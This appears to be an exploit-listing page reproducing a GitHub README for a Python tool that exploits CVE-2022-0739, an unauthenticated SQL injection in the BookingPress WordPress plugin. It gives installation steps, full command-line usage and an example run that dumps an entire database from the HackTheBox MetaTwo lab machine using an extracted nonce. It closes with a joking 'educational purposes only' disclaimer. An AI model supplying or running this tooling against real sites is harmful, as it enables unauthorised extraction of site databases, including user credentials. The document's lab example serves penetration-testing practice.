Exploit for SQL Injection in Reputeinfosystems Bookingpress CVE-2022-0739

## https://sploitus.com/exploit?id=957876F8-28CA-5ED8-9F25-16F1D36DD7B0
# CVE-2022-0739

My take on CVE-2022-0739 BookingPress exploit, based on [destr4ct](https://github.com/destr4ct/CVE-2022-0739)'s POC - just prettier.

## Example

Example usage against HackTheBox's MetaTwo machine, which hosts a WordPress with a vulnerable bookingpress plugin (version 1.0.10).

```bash
python booking-sqlinjector.py -u http://metapress.htb -nu http://metapress.htb/events/ -a -o db_dump
```

[![asciicast](https://asciinema.org/a/HeSO2mjs0g69V3a6KcvqwlM0P.svg)](https://asciinema.org/a/HeSO2mjs0g69V3a6KcvqwlM0P)

## Usage

```bash
usage: booking-sqlinjector.py [-h] -u URL [-o BASENAME] [-p PAYLOAD] [-a] [-v] (-n NONCE | -nu NONCE_URL)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of WordPress server with vulnerable plugin (http://example.domain)
  -o BASENAME, --out BASENAME
                        Output database schema and dump in JSON format
  -p PAYLOAD, --payload PAYLOAD
                        Payload to inject. Should start with ')'
  -a, --dump-all        Enables whole DB dump
  -v, --verbose         Enables verbose mode
  -n NONCE, --nonce NONCE
                        Nonce that you got as unauthenticated user
  -nu NONCE_URL, --nonce-url NONCE_URL
                        URL where nonce can be extracted (bookingprss form page)
```

## Installation

```bash
git clone https://github.com/viardant/CVE-2022-0739
cd CVE-2022-0739
pip install -r requirements.txt
```

## Disclaimer

TL:DR; For educational purposes only, do not break stuff that you don't own or have permission to pentest. If you use this program for any nefarious purposes, the cybersecurity gods may smite your computer with a malware so devastating, you'll wish you had just bought a Mac.